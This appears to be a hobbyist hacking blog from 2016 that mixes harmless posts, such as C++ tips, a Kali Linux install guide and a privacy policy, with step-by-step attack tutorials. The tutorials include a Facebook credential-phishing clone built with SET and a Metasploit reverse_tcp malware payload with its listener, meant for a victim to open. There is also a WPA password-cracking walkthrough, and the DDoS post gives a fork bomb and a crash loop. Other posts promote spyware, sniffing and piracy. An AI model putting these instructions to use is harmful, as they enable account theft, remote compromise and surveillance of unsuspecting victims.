We are legion, for we are many.

Saturday, October 15, 2016

Watch online movies for free.

9:11:00 AM Posted by Unknown No comments
Yo what's up you guys! Today I'll be doing something different. I'll be discussing with you on how to watch online movies for free. That's right for free. On some of these sites you have to sign up but in some you just give the movie name & select what quality the movie should be and start streaming that movie directly to your TV, mobile device or computer. 

These sites are providing movies for free so you have to hide your IP so the government doesn't track you down. You must have a VPN enabled so you can watch movies without any problem.

So the sites that can be used to watch online movies are:

1) http://www.watchfree.to/
2) http://xmovies8.tv/                        //I recommend this one.
3) http://123movies.to/
4) http://kat.tv/
5) http://kisscartoon.me/ (For TV Shows ONLY)
Yeah there you go. These sites provide online movies for free. Also, these sites use a lot of ads so be sure to install adblock.

That's it for this post guys. I hope you guys benefit from the info provided here. 

See ya.

Thursday, October 13, 2016

Top 7 apps rooted devices must have.

10:00:00 PM Posted by Unknown No comments
Hey what's up you guys!? Today I'll be discussing apps you should have if you have a rooted android device.
Well for starters meaning of root is to have admin privileges to your mobile so you can change the performance or working of your mobile. When I had my rooted device I had many apps that I used to use. Many of these apps helped me change many files. 
[NOTE: The apps that I mention here might have been outdated. I haven't used rooted apps for very long so I don't have an update on these apps ]

So I'll be giving you the list of the apps that I think You should have if you have a rooted device.

1. Supersu: Supersu is a application software that allows you to root your device without being connected to a computer. 
It's by far the best app to root your device. Farmaroot comes in second place for rooting your device.Download Supersu here.

2. Wi-fi kill: If you have a rooted device this app is the best for cutting the internet for the devices connected to the network you are connected to.Download wi-fi kill here.

3. dsploit: Dsploit (for me) is by far the best app for hacking devices that are connected to your network. It acts as wifi kill, MITM attacker, cookie stealer and many more. It is the treasure chest for network hacking apps.Download dsploit here.

4. Freedom: This app is mainly used to buy in-app purchases. Yep you read right!! You can buy in-app items like game coins for free. It won't work for online games like clash of clans and others of the same category.Download freedom here.

5. Market unlocker: This app is mainly used to unlock apps that are restricted in your country or mobile. It must be installed and turned on if you want to use freedom.Download Market Unlocker here.

6. Root browser: The best app for changing the game code. Like in an offline game that doesn't require the internet, you can change it's source code so it gives you your desired result. eg: If you have 1000 coins in your game and want to have 9999999 coins use root browser to browse to the apps code and change the code like it will have the code like 
int coins=1000; //You can change it to like 
int coins=99999999;
and hit save & then you will have 99999999 coins in your coin.Download root browser here.

7. Game killer: The app that is used to change in game values without manually going to the game's source code and changing it yourself. It is preferred over root browser. But it is a little difficult to use as compared to root browser. So root browser should be your ideal choice. Download game killer here.

So yeah there it is guys! My list of the apps that rooted devices must have for max use.
Thank you guys, this is it for today. If you could recommend items that I must add to this list please do comment in the comment sections below. Also subscribe to the newsletter to get maximum knowledge from this site.
See you later. Bye!!

Wednesday, October 12, 2016

5 ways to earn money online.

10:48:00 PM Posted by Unknown , , , No comments
Hey you guys!!! What's up?? So today I'll be discussing about something that many people question about. How can you earn money online. In that topic I'll be giving some light. For starters you can't earn money online without putting in any effort. There are many ways you can earn online.
1. Doing online surveys: Online surveys are the most time consuming good for nothing way to earn money online. If you want to earn about $2-3 /5 hrs then this is just made for you.
2. Freelance writing: Freelancing is the best method for earning money online. You can write articles for websites and blogs that offer money to freelancers. On average you can earn about $10-20 per article. For sites like listsverse, back2college you can earn about $100 for well written articles that contain at least 1000 words.
3. Blogging and writing: If you have great traffic to your blog and you sell products in your blog you can leave your day job and earn from your blog. On average if you have ads in your blog you can earn $6-10/1000 visitors. Many sites have about 100,000 visitors per day so you do the math it'll be $600-1000 per day. Yeah, isn't it worth it. In this blog there isn't that much traffic for me to monetize so I start earning money, there are about 80-100 visits per day, that isn't much. But I enjoy writing for this blog so I don't really care that much.
4. Transcribing: Transcribing means to convert video/audio to text. If you have excellent typing skills You can earn money using that skill online. Many people pay for transcribing their audio to text so if you have the time go and apply for transcribing jobs. Trust me they're worth the effort.
5. E-book writing: The best method that pays for people who love to write about stories, novels or method to do some certain task. This is just for you. You can write for amazon kindle and earn good money doing so. You can write quality content and that'll just sell like items on black Friday sales. Selling e-books depends on the quality of your book not quantity. If your 50 page e-book can give me as much information as a 200 page e-book, I'd prefer to buy your e-book so if you want to earn money online don't forget to be dedicated to the job you're doing. If you love doing what you do then great ideas will flux through your brain. 

That's it for today guys. I hope you got a lot of info on how to earn money online. If you live outside of the US and want to make online transactions that need the bank in the US try to register for payoneer master card. If you order for payoneer card through my link you won't have to pay $25 for registration. It'll be shipped to you. What payoneer does is it acts as a bank in the US and when clients deposit money to your payoneer card, it'll come to your payoneer account and you can withdraw it in your local bank. That's how simple it is.
You can apply for the payoneer card here .

So yeah that's it guys. Please share this article in social media. We have to grow this site and it can't be done without your help. 

See ya!

Hack any facebook account.

9:27:00 AM Posted by Unknown , , No comments
Hey ya people!! How you doin today!

Today will be something special. Today I'll be teaching you guys how to hack facebook of someone on your network. We can't call ourselves hackers if we can't hack facebook. Hacking facebook is the threshold of being a novice hacker.

Now you don't wanna be searching google for facebook hacking apps that hack facebook in minutes or the first search result that involves downloading apps. 

In this blog post I'll be teaching you how to hack by phishing. Now this method only works for computers on your network. I will be doing a article on how to hack facebook outside of the LAN, soon. 

But for now lets focus on the things at hand, you'll need kali linux for this to work. You can read my article on how to download kali linux here :- https://weareanonymousa.blogspot.com/2016/07/how-to-download-kali-linux.html

So now let's get to it.

1. Open up terminal and type "setoolkit".
2. Now if it says press enter or something press enter.
3. Now it'll give you a list/menu to choose how you wish to use this kit.
4. Choose Social-Engineering Attacks. You don't enter the name you just enter 1 and press enter.
5. Now press 2 i.e for Website attack vectors.
6. Press 3 for Credential harvester attack method.
7. Now enter 2 for Site cloner.
Now the pattern is 1 [enter] 2 [enter] 3[enter] 
2 [enter].
It will now ask for "IP address for the POST back in Harvester/Tabnabbing:" There you enter your machines ip address. You can find it out by typing ifconfig in terminal.
Now it'll ask which site to clone. You type in "www.facebook.com"
It's all done. To find where your files are, go to Computer>var>www>html. And you will find your files there. There will only be 1 text file
The text file will give you all the info after the victim has filled out all the information.

Now send the victim the cloned site. It's just the ip you put above. 
So now the victim gets the ip. He/she opens it. Logs into her/his account and we get the info required.
To get the required information Just go to the text file in the html folder. And voila you have the victims credentials. 
Now I'll be doing a follow up post to this article on How to hack facebook outside the LAN. So, yeah I hope you enjoyed todays post. Please keep on visiting weareanonymousa.blogspot.com . And I'll see you in the next one.


 
See ya!


 

Tuesday, October 11, 2016

How to watch a movie in cmd.

6:25:00 AM Posted by Unknown , , No comments
Yooo what is up you guys!? Today I'll be discussing about something different. Today I'll be teaching you guys how you can watch a movie on command prompt. Well, we watch online movies , we watch movies in the cinema right!? So today we'll be watching a movie in cmd. It isn't any other movie, it's star wars. For this You need a telnet client. So lets get to it.

1. Open cmd/terminal.
2. Type in telnet.blinkenlights.nl 
3. Watch star wars.

After you press enter you will be able to watch the movie.

If you have an error regarding telnet, you might not have enabled telnet client in your PC. To enable this:-

1. Go to programs and features. In windows 10 you can do this by right clicking on the start button.
2. Select turn Windows features on or off.
3. Search for Telnet clients, and click on that. 
4. Press ok and you're good to go. 

Hope you enjoyed reading this post on How to watch a movie in cmd.

Please do comment down below on what topic I should make an article on. And thank you for visiting weareanonymousa.

See ya.

Monday, October 10, 2016

What is DDOS?

8:36:00 AM Posted by Unknown , , No comments

Hey you guys?! Whats up !! Today I'll be discussing a new term. Its called DDos and its a very common type of attack that hackers use while hacking into a system or while a hacker tries to bring down the system. Many TV series bring up the topic DDos. Its one of the most basic term that every computer enthusiast must know. A denial-of-service (Dos) attack is an attempt to make a machine or network resource available to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the internet. Denial of service is typically accomplished by flooding the targeted machine or resource with superfluous requests in an attempt to overload systems and prevent some or all legitimate requests from being fullfilled.
A distributed denial-of-service (DDos) is where the attack source is more than one, often thousands of, unique IP addresses. It is analogous to a group of people crowding the entry door or gate to a shop or business, and not letting legitimate parties enter into the shop or business, disrupting normal operations. The scale of DDos attacks has continued to rise over recent years, even reaching over 600Gbit/s.

An example of Dos is:
:(){:|:&};: //If you type this in terminal of a linux machine, the OS will crash.
                                               OR
:1
start 
goto 1

If you type this in notepad and save it as a .bat file and run it, your OS will not be able to respond, it'll crash
Let me explain DDos in a nutshell. Assume you are in a restaurant that is not that big. So if you call the waiter he'll take your order and give it to the chef right? Now assume there is only one waiter and there are 100 of people giving him their order. The waiter can't possibly complete all your requests and will ask for a time out. Well thats the basic of DDos. In this scenario you're the client and the waiter is the server. Put the logic in the above context and you'll understand what DDos is. There are many types of Dos attacks but I can't discuss all of them since I don't know all of them. But the basic is the same most of them.

Well thats all for today's article. Hope you got a lot of info on the topic Dos. See you next time.

Please do comment on what topics I should discuss on down in the comments section below.

Sunday, October 9, 2016

5 Most expensive mobile phones in the world.

9:53:00 AM Posted by Unknown , No comments
Hey there! What is up you guys!?? Today I'll be counting down the Top 5 Most Expensive Mobile phones in the world.
We all have cell phones. But in this world there are people who are really into buying regular cell phones which are made up of diamonds, gold and what not. So today I'll be telling you guys what type of cell phones these rich bastards buy. 
Lets start the countdown.

5. Gresso Luxor Las Vegas Jackpot($ 1 million)
In the fifth place we have Gresso Luxor Las Vegas Jackpot which is priced at a million dollars($1000000). Yep and this is the 5th place wait till the first place. You guys may be wondering what must this phone offer for it to be so expensive. Well for starters if you enable airplane mode in this phone, it'll transform into a rocket and you can send it to the ISS!(*Sarcasm intended)
Well no joke but the reason for it to be so expensive is because it has black diamond that cost a staggering 46 K that covers its front and a 200 year old blackwood used for its back. And who can foget its 12mm thin frame made of 190g of gold. Its keyboard is made of sapphire that costs about 35k. 

4. Diamond Crypto Smartphone ($ 1.3 million)
In the fourth place we have the Diamond Crypto Smartphone which is a kind of a unique mobile phone as it has Windows OS installed in it. It was made by Peter Allison who is a luxurious mobile designer. The mobile is covered with about 50 diamonds. And a expensive mobile is not expensive unless you coat it with gold. The Diamond Crypto is a mobile for people who want to be kidnapped(Sarcasm intended).

3.  Diamond Rose iphone 4 32Gb ($8 million)

In the third place we have the Diamond rose iphone 4 32GB. To be honest, I don't know what kind of an idiot would buy an iphone 4 today let alone a iphone 4 worth $8 million.  Yep, you read right. This iphone is priced at $ 8 million dollars. And this is a baby compaired to the one that's gonna be in the first place in the count down. The reason why this iphone is worth so much is because its apple logo is covered with diamonds, its home button is made up of platinum.

2. iphone 5 Black Diamond ($15 million)

In the second position in this list and in the world we have the iphone 5 covered with black diamond. Black diamond along with gold diamonds are among the most rarest diamonds in the world. In #5 of this list there was a cell phone covered with black diamond right? Well same is for this one. It is made of of many rare diamonds which makes it so expensive. 

1.Falcon SuperNova Pink Diamond iphone 6 ($96 million)

Well here we are! In the First position of this list we have the Falcon SuperNova Pink Diamond iphone 6 which is the most expensive mobile phone in the world. Unlike the other mobiles discussed this iphone doesn't have gold plated this or that. The main reason it is so expensive is because it has two 18 carat diamond in the device which can be easily spotted by its pink and blue colour. The 18 carat diamond costs about $46 million each. Now you do the math. So yeah that's it the worlds most expensive mobile phones.

Thank you guys for visiting weareanonymousa. It's because of you guys I keep on making new posts on this blog. This site is growing uniformly so one day I know it'll reach it's full potential, and this won't be possible if you guys don't support me. So please let me know down in the comments for any questions. Also please do recommend what type of future posts you want me to do.    :)
See ya! 

Saturday, October 8, 2016

Privacy Policy.

11:59:00 PM Posted by Unknown No comments
weareanonymousa.blogspot.com Privacy Policy
This privacy policy has been compiled to better serve those who are concerned with how their 'Personally
Identifiable Information' (PII) is being used online. PII, as described in US privacy law and information security, 
is information that can be used on its own or with other information to identify, contact, or locate a single person,
 or to identify an individual in context. Please read our privacypolicy carefully to get a clear understanding of 
how we collect, use, protect or otherwise handle your Personally Identifiable Information inaccordance with our 
website.

What personal information do we collect from the people that visit our blog, website or app?

We do not collect information from visitors of our site.
or other details to help you with your experience.

When do we collect information?

We collect information from you when you subscribe to a newsletter or enter information on our site.


How do we use your information?

We may use the information we collect from you when you register, make a purchase, sign up for our newsletter, respond to a survey or marketing communication, surf the website, or use certain other site features in the following ways:
       To personalize your experience and to allow us to deliver the type of content and product offerings in which you are most interested.
       To improve our website in order to better serve you.

Do we use 'cookies'?

Yes. Cookies are small files that a site or its service provider transfers to your computer's hard drive through your Web browser (if you allow) that enables the site's or service provider's systems to recognize your browser and capture and remember certain information. For instance, we use cookies to help us remember and process the items in your shopping cart. They are also used to help us understand your preferences based on previous or current site activity, which enables us to provide you with improved services. We also use cookies to help us compile aggregate data about site traffic and site interaction so that we can offer better site experiences and tools in the future.

We use cookies to:
       Compile aggregate data about site traffic and site interactions in order to offer better site experiences and tools in the future. We may also use trusted third-party services that track this information on our behalf.

You can choose to have your computer warn you each time a cookie is being sent, or you can choose to turn off all cookies. You do this through your browser settings. Since browser is a little different, look at your browser's Help Menu to learn the correct way to modify your cookies.

If you turn cookies off, some features will be disabled. It won't affect the user's experience that make your site experience more efficient and may not function properly.

However, you will still be able to place orders .


Third-party disclosure

We do not sell, trade, or otherwise transfer to outside parties your Personally Identifiable Information.

Third-party links

We do not include or offer third-party products or services on our website.

Google

Google's advertising requirements can be summed up by Google's Advertising Principles. They are put in place to provide a positive experience for users. https://support.google.com/adwordspolicy/answer/1316548?hl=en
We have not enabled Google AdSense on our site but we may do so in the future.

California Online Privacy Protection Act

CalOPPA is the first state law in the nation to require commercial websites and online services to post a privacy policy. The law's reach stretches well beyond California to require any person or company in the United States (and conceivably the world) that operates websites collecting Personally Identifiable Information from California consumers to post a conspicuous privacy policy on its website stating exactly the information being collected and those individuals or companies with whom it is being shared. - See more at: http://consumercal.org/california-online-privacy-protection-act-caloppa/#sthash.0FdRbT51.dpuf

According to CalOPPA, we agree to the following:
Users can visit our site anonymously.
Once this privacy policy is created, we will add a link to it on our home page or as a minimum, on the first significant page after entering our website.
Our Privacy Policy link includes the word 'Privacy' and can easily be found on the page specified above.

You will be notified of any Privacy Policy changes:
       Via Email
Can change your personal information:
       By emailing us

How does our site handle Do Not Track signals?
We honor Do Not Track signals and Do Not Track, plant cookies, or use advertising when a Do Not Track (DNT) browser mechanism is in place.

Does our site allow third-party behavioral tracking?
It's also important to note that we do not allow third-party behavioral tracking

COPPA (Children Online Privacy Protection Act)

When it comes to the collection of personal information from children under the age of 13 years old, the Children's Online Privacy Protection Act (COPPA) puts parents in control. The Federal Trade Commission, United States' consumer protection agency, enforces the COPPA Rule, which spells out what operators of websites and online services must do to protect children's privacy and safety online.
We do not specifically market to children under the age of 13 years old.

Fair Information Practices

The Fair Information Practices Principles form the backbone of privacy law in the United States and the concepts they include have played a significant role in the development of data protection laws around the globe. Understanding the Fair Information Practice Principles and how they should be implemented is critical to comply with the various privacy laws that protect personal information.
In order to be in line with Fair Information Practices we will take the following responsive action, should a data breach occur:
We will notify you via email
       Within 7 business days

We also agree to the Individual Redress Principle which requires that individuals have the right to legally pursue enforceable rights against data collectors and processors who fail to adhere to the law. This principle requires not only that individuals have enforceable rights against data users, but also that individuals have recourse to courts or government agencies to investigate and/or prosecute non-compliance by data processors.

CAN SPAM Act

The CAN-SPAM Act is a law that sets the rules for commercial email, establishes requirements for commercial messages, gives recipients the right to have emails stopped from being sent to them, and spells out tough penalties for violations.
We collect your email address in order to:
       Send information, respond to inquiries, and/or other requests or questions

To be in accordance with CANSPAM, we agree to the following:
       Not use false or misleading subjects or email addresses.

If at any time you would like to unsubscribe from receiving future emails, you can email us at
and we will promptly remove you from ALL correspondence.

Contacting Us

If there are any questions regarding this privacy policy, you may contact us using the information below.
weareanonymousa.blogspot.com
Dhumbarahi pragati tole
Kathmandu, Madhya Pashchimanchal 44600
Nepal
hardyman96@gmail.com

Last Edited on 2016-10-09

How to add a new user in Kali linux.

7:58:00 PM Posted by Unknown No comments
Hey what is up you guys!? Today I'll be teaching you how to to create a new user in kali linux. I don't I need to tell you why you need to create a new user except for root. It is mainly to run applications that won't run in the root account.
So let's get started.


  1. Open up terminal and type:- useradd -m yourusername and press enter.    [In username type your username for the guest account]
  2.  Now to add a password type:- passwd yourusername and press enter.
  3. Now to add the sudo privilege to the account type :- usermod -a -G sudo yourusername and press enter. Here -a will add and -G will give the group this account to add to their directories. 
  4. Now to change the default shell to bash type :- chsh -s /bin/bash yourusername and press enter.
And that's it. You've successfully created a new user in kali linux.
Thank you guys for visiting my blog and I'll see you in the next one.

Best app to hide your ass while surfing the internet.

11:48:00 AM Posted by Unknown , , , , No comments
Hey you guys Its me hardy, back with another post on how to install tor in a kali machine. I've been using kali for about a week or so and I'm totally falling in love with it. The only thing that kali is famous among layman is for it remarkable application list but it is missing the tor browser from its list. But don't you worry I'll be teaching you how to install and use tor. For those of you who don't know what tor is let me explain it in a nutshell. Tor is a internet browser used to surf the net without being traced back. Its like walking without leaving a trail. Now lets get to it shall we.

Step 1: 
First You'll have to install tor.
For this, open terminal and type apt-get install tor .
Step 2:
Download tor at their official
site https://www.torproject.org/projects/torbrowser.html.en [I prefer the 64-bit version]
Now to setup the bundle open up another terminal and type
cd ~/Downloads/           {Instead of Downloads type in where your tor is downloaded.}
tar -xvJf tor-browser-*
cd tor-browser*
./start-tor-browser.desktop

That's it!! You've successfully downloaded tor browser in your kali machine! Now you can watch as much huh-huh as you want without being watched by anyone.
There is one more thing you want to know. If you are downloading using root you'll be greeted by an error like sudo or root something. To avoid this, install tor in a guest account in your kali machine and you are good to go. Please let me know down in the comments below if you are having a problem.  See you later people.    

Monday, October 3, 2016

3 best hacking apps for beginners.

10:24:00 AM Posted by Unknown No comments
Today I'll be discussing with you 3 apps used for hacking in rooted android devices.
[NOTE]::Your device must be rooted/Jailbroken for these applications to work. I would like to say I do not own any of these apps if you intend on using it, I will not take responsibility of your actions
Before we start with the list why don't we discuss about root.
What does rooting mean?
Rooting, for those of you that don’t know, means giving yourself root permissions on your phone. It’s similar running programs as administrators in Windows, or running a command with sudo in Linux. With a rooted phone, you can run apps that require access to certain system settings, as well as flash custom ROMs to your phone, which add all sorts of extra features.
 Now, onto the list :
3: AndroRAT.
Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.
Some features of AndroRat are

Get contacts (and all theirs informations)
Get call logs
Get all messages
Location by GPS/Network
Monitoring received messages in live
Monitoring phone state in live (call received, call sent, call missed..)
Take a picture from the camera
Stream sound from microphone (or other sources..)
Streaming video (for activity based client only)
Do a toast
Send a text message
Give call
Open an URL in the default browser

Do vibrate the phone




2:Spoofapp

In March 2008 SpoofApp.com released the first ever native iPhone application for Caller ID spoofing. This is the first time that Phone Gangster and SpoofCard users are able to place fully functional calls from PhoneGangster and SpoofCard from an application built into their phone. The Spoof App used the popular Installer.app App Tapp package to deliver the software to the jailbroken iPhones. A "jailbroken" iPhone is an iPhone that has been hacked to allow third party software applications that are provided outside of Apple's authority. Jailbreaking iPhone's is relatively safe and easy with a variety of tools that can be found on modmyi.com. SpoofApp received over 40,000 installs in its first day listed in the Installer app.
iSpoofCard 1


1:Whatsapp sniffer.

Whatsapp Sniffer is the top app which is used to Spy Whatsapp of others. Which breaks the Whatsapp Messaging system of others who uses whatsapp. Whatsapp Spy is nothing but we can access others whatapps account and see their Messages, Photos and videos. It gives you unlimited access to anyone's privacy. As we all know that Whatsapp is an unbeatable messaging app service which is free of cost too. It is the best service world wide. 10 billion messages are processing each day by whatsapp. So that's the crazy of whatsapp going around the world right now. Presently each and every android smartphone has whatspp installed in it. This app uses MITM attacks to capture information from others within the LAN. I Will soon write an article on MITM attacks and how to perform one in Kali linux.
whatsapp-hack-whatsapp-sniffer-whatsapp-android-hack-how-to-use-whatsapp-sniffer-wattsapp-spy-download-hack-whatsapp-sniffer-whatsapp-sniffer-for-iphone-whatsapp-sniffer-oo±o­-descarga


Thats it people, it was just a small article on 3 app that'll help you gian interest on hacking. These may just ignite a flame within you that can help you learn hacking. These apps don't teach you how to hack but do all the hacking for you. If you are really a born hacker you will want to know the mechanism of these apps. I will do a lot of articles on how to increase your hacking skills. Please write down in the comment section what types of articles you want to see on this blog, I will try my best to write on that topic. Thank you guys and please don't forget to share this article on social media.


Sunday, October 2, 2016

Why did apple ditch the headphone jack?

10:28:00 AM Posted by Unknown No comments
Hey guys I'm here to discuss on why apple ditched the headphone jack.
NOTE:: The information I publish here is not of my own If I happen to have a bit of information that you might think to be stolen please understand it is purely coincidental. My source is latest news, interviews and many lectures.

You might all think iphone removed the headphone jack as a plot to sell wireless earbuds but then thats where you're wrong my friend.
The headphone jack may look tiny on the outside. But on the inside, this 52-year-old technology requires a relatively huge box to receive the plug. Phone makers can’t stand that thing. It’s in the way of making the battery bigger. It’s in the way of putting in a better camera, or nicer speakers. All the phone makers want to ditch the jack and Apple’s actually the third smartphone maker to do it.
If you think carefully you can see that Apple’s trying to make the transition easy. In the box with the phone, you get a new set of earbuds that plug into the charging jack. Also in the box with the phone, you get this adapter that lets you plug in any headphones. They can just stay on the headphone cable. You can buy another one for 9 bucks.
Now for the people who hate the idea of a  headphone jackless phone, I ask you “Would you rather have a headphone jack — and give up the things that Apple put in its place? Like a bigger battery that lasts 2 hours longer. And a camera stabilizer that eliminates blurry shots. And stereo speakers.”

Now If you really think about it, apple did a good job by removing the headphone jack.



Some information for this article was taken from:
https://www.yahoo.com/tech/now-i-get-it-why-apple-took-away-the-headphone-jack-from-the-iphone-7-214340889.html

P.S. If you think this information is worth sharing please do post this article in social media.We together can make this blog big. Thank you for supporting me! :)


How to Dual boot kali linux on a windows platform.

8:15:00 AM Posted by Unknown No comments
Hello Guys!! Today I'll be teaching you how to dual boot Kali linux on a windows machine.
There are three main things you need to have before performing this task.
  • A bootable usb with kali linux in it(You have to burn it to the usb).
  • A separate system partition for kali.
You can Download kali linux here.
After downloading kali, burn it to a usb drive by using rufus.
Now create a system partition by following the process:

  1. On your windows machine go to disk manager.
  2. There you will see your primary storage drives. Now select the storage from which you want to get the required memory. I would recommend using the drive with maximum storage capacity.
  3. Right click on the drive, you will see an option called shrink volume.
     
  4. Now select shrink volume and after that you can customize your new volume according to your will. But select a space of about 50 gb.
  5. Now this new volume will be Unallocated. Right click on the volume and a menu will appear "New Simple Volume". Click on it. This will give it a separate distinction on its volume.
  6. Now you are ready to install Kali linux.
  7. Power down your computer then insert your USB drive. Make sure you have enabled boot by USB in the BIOS settings. 
  8. After that you will be taken to the installation process. You can now easily install kali.
After the installation is finished you can remove your USB drive and run kali. If you wish to use windows then simply shutdown kali and you will be taken to windows system.

Thank you guys for reading this article on HOW TO INSTALL KALI LINUX
Keep on visiting weareanonymousa Stay blessed.

Monday, July 11, 2016

How to Download Kali linux.

5:44:00 PM Posted by Unknown No comments
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as  Penetration Testing, Forensics and Reverse Engineering.
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of BackTrack Linux, adhering completely to Debian development standards.
You can download kali at :
https://www.kali.org/downloads/

Download the iso file for virtual box you can choose between the 64-bit or the 32-bit one.
You can download it very easy so enjoy and see you later bye.

Sunday, July 10, 2016

100% Effective way to master C++. [For a Post-beginner person]

5:40:00 PM Posted by Unknown No comments
C++ is a OOP i.e, it is a object oriented programming language developed by Bjarne Stroustrup,and is just another extension of C language. For programming you will first need to have a good idea on what and how to program beautifully. Let us imagine a building the building will be very strong if it's foundation is very strong, this foundation is C language then after comes C++ then Python and so on and so forth. So today I'll be giving tips on how to Understand C++. I chose C++ becausse Its the only programming language i'm practicing at the moment. So please bear with me, if you want tips on any other language please comment below. Alright now lets get to it.
THESE ARE THE BASICS :
1. Various uses of the 'const' keyword and its liberal use.
2. C++ references, const references and temporaries.
3. Basic class syntax, difference between public, protected and private inheritance and *virtual functions*.
4. How the constructor and destructor work, their relation to definition scope for C++ objects on stack, and to the new and delete operators for C++ objects on the heap. The importance of virtual destructors.
5. Default initialization vs value initialization.
6. Copy constructor, assignment operator, nothrow swap.
7. Understand and adopt Resource Acquisition is Initialization (RAII).
8. Operator overloading - especially chaining of overloaded operator calls.
9. What "new operator" and "delete operator" do, and their distinction from "operator new" and "operator delete". Also the different variants of new and delete, including placement new.
10. Exceptions, how to use them efficiently and unobtrusively.

STL + More advanced stuff


11. Rules for overload resolution and what leads to hiding of functions / data in a class or its base classes.

12. Get a basic hang of templates and terminology surrounding them: class template vs template class, template id, template parameter vs template argument, function template. Understand template specialization and partial template specialization. Understand overload resolution between non-template and template functions.
13. Advanced class design techniques - Pimpl idiom, proxies (e.g. smart pointers), private inheritance and template method pattern. Rule of Three, Rule of Zero.
14. STL: different classes of objects - containers, iterators, algorithms, functors, container adaptors, iterator adaptors, functor adaptors.
15. STL dos and don'ts. Understand how to perform specific operations on specific containers e.g. deleting elements from sequence containers vs associative containers.
16. Basic understanding of the iostream facility: the class hierarchy, role of streams and streambuffer classes, manipulators.
17. Namespace, argument dependent lookup (Koenig lookup), its implications.
18. Copy elision and return value optimization.

C++ 11 stuff

19. auto: use the auto keyword in its new avatar liberally to spare yourself from having to type ugly, convoluted, nested typenames.
20. rvalue references, move constructors, perfect forwarding, move iterators: I wouldn't be overstating things if I said, you'd be halfway through C++ 11 by getting a grip on just this one topic. There is an immense amount of subtlety in this topic - and enough reason to hate C++ for it. And yet this is the one facility that drives a lot of the other new features, especially in the STL containers and generally in allowing for more efficient semantics in class interfaces.
21. initializer lists: very useful stuff.
22. range based for-loops: lets you write neat loops around containers.
23. lambda functions: very useful if you know when to deploy and how to format lambdas right. Can become unreadable junk if you don't.
24. STL containers: forward_list (singly linked list), unordered_set (hash table)/unordered_map (hash based symbol table), emplace / emplace_back methods in sequence containers, move_iterators.
25. Ratio and Chrono libraries.
26. Concurrency and atomics: big topic. Worth getting familiar with how you could port your existing Win32 or pthreads code to C++ 11. But there is much more to this library - including atomic data types and operations, futures and promises.

Really useful Boost libraries

Boost Any
Boost Variant
Boost Exception
Boost Regex
Boost Range
Boost Bimap
Boost DateTime
Boost Filesystem
Boost Thread
Boost Coroutine
Boost Asio

Boost Phoenix

Boost MPL
Boost Spirit
Boost Fusion
Boost Xpressive

How to make a malware.

7:39:00 AM Posted by Unknown No comments
HEYYYYYY GUYSSSSS!!!! WHAT IS UPPPPP!!!!!?????? Today I'm in a very good mood because...because, ohhh I don't know.
So lets get to it today I'll be teaching you how to make a malware using metasploit.
Metasploit actually is a software that is used to make and exploit codes against a remote machine.  We'll be using this to make a malware program that can be used to look through the victims camera and record through his recorder without him knowing it. It can be used in many other ways. But today we'll be sticking to malware creation.
Okay first thing you'll be needing is kali linux for this hack.
before you start, open terminal in kali linux and type in ifconfig then copy your ip address
So let's get down to it:


  1. Open up terminal and type in "msfpayload or msfvenom windows/meterpreter/reverse_tcp LHOST=paste your ip address here LPORT=4444 X>/root/filename.exe"
  2. To verify the exe file go to home and you'll see your file there
  3. Now to set up the listener.
  4. Open up another terminal and type "msfconsole".
  5. Type "use exploit/multi/handler".
  6. "set LHOST your ip address here".
  7. "set LHOST 4444"
  8. "set PAYLOAD windows/meterpreter/reverse_tcp"
  9. "exploit".
And thats it, now all you have to do is to send the file to the victims computer an have them open it. After they do you'll see some codes appear on the screen to look at what you can do now type in help and look at the options available.
That is all for Todays Tutorial. Thank you for visiting and please dont forget to share this blog with your friends and on social media, I'd really like it if you'd all help me in increasing the traffic of this blog because it would be much more fun if more people saw my content. If the traffic of this blog keeps on increasing I'll be uploading some kickass posts so thank you once again and bye bye!!

How to know if your internet is hackable?

12:33:00 AM Posted by Unknown No comments
Cracking wifi passwords can be really tough but with the right guidance you can master it in no time. So, today I'll be teaching you how to hack wifi using kali linux.
The required accessories for this tutorial are:-


  • Kali linux.
  • A wireless adapter.
  • A very very good word list.
So after you have all these required items lets get to work.




  1. Open up you terminal and type "ifconfig"(without the quotations)
  2. If your adapter is woring fine you should see wlan0
  3. To start monitor mode type "airmon-ng start wlan0".(without the quotations)
  4. After you enter the code you will see a list of active processes, kill all these processes because they will trouble us later. kill them by typing "kill <process>" there will be two columns on the left will be numbers and on the right will be alphabets.  If on the left there is 804 and on the right there is networkmanager type "kill 804" to kill the process.
  5. To show the list of available WiFi network types, type in "airodump-ng wlan0mon".
  6. Start capturing the packets of your target network
    type the following command;
  7. airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 
  8. Stop the capturing using ctrl+c and type "ls" that would bring up all the current directories and files. Select the one with ".cap" extension and type the following command:\
  9. aircrack-ng -w <full location of word list> <name of the file>
Wait till it searches the wordlist for the passcode, if the passcode is present within the wordlist the output will give you the password or it will keep on searching.
Thank you guys for visiting and have a wonderful day ahead. And please do follow me on instagram and snapchat. 

What is discovery scanning?

12:05:00 AM Posted by Unknown No comments
Discovery scanning is the process of identifying live hosts on a network. In the context of
penetration testing, this is usually performed to identify potential targets for attack. The
objective here is not to exhaust resources in gathering information about targets, but instead,
to merely find out where the targets are logically located. The final product of our discovery
should be a list of IP addresses that we can then use for further analysis. In this chapter, we
will discuss how to discover hosts on a network by using protocols operating at layer 2, layer 3,
and layer 4 of the OSI model. The following tutorials will include each of the following recipes:
#Using Scapy to perform layer 2 discovery
#Using ARPing to perform layer 2 discovery
#Using Nmap to perform layer 2 discovery#Using NetDiscover to perform layer 2 discovery
#Using Metasploit to perform layer 2 discovery
#Using ICMP ping to perform layer 3 discovery
#Using Scapy to perform layer 3 discovery
#Using Nmap to perform layer 3 discovery
#Using fping to perform layer 3 discovery
#Using hping3 to perform layer 3 discovery
#Using Scapy to perform layer 4 discovery
#Using Nmap to perform layer 4 discovery
#Using hping3 to perform layer 4 discovery
Discovery Scanning
46
Prior to addressing each of these scanning techniques specifically, we should first address a
few underlying principles. The Open Systems Interconnection (OSI) model is an International
